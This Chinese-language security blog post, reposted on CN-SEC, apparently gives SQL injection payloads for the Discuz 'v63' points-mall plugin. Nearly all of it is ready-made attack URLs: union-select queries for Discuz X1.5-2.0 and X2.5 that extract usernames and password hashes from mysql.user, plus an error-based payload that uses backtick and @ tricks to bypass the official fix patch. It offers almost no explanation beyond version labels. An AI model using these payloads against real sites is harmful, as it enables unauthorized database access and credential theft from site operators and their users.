Discuz v63积分商城插件注入&各种绕过

没穿底裤 2020年1月1日02:25:30评论402 views字数 573阅读1分54秒阅读模式
摘要

  For Discuz X1.5-2.0
[php]
http://localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
[/php]

 

 

For Discuz X1.5-2.0
[php]
http://localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
[/php]

For Discuz X2.5
[php]
/discuz/plugin.php?id=v63shop:goods&pac=info&gid=@`'` union select @`'`,2,3,4,5,6,7,concat(host,0x3a,user),9,10,11,12,13,14 from mysql.user
[/php]

绕过Discuz修复补丁
[php]
http://localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`[/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日02:25:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Discuz v63积分商城插件注入&各种绕过https://cn-sec.com/archives/75183.html

发表评论

匿名网友 填写信息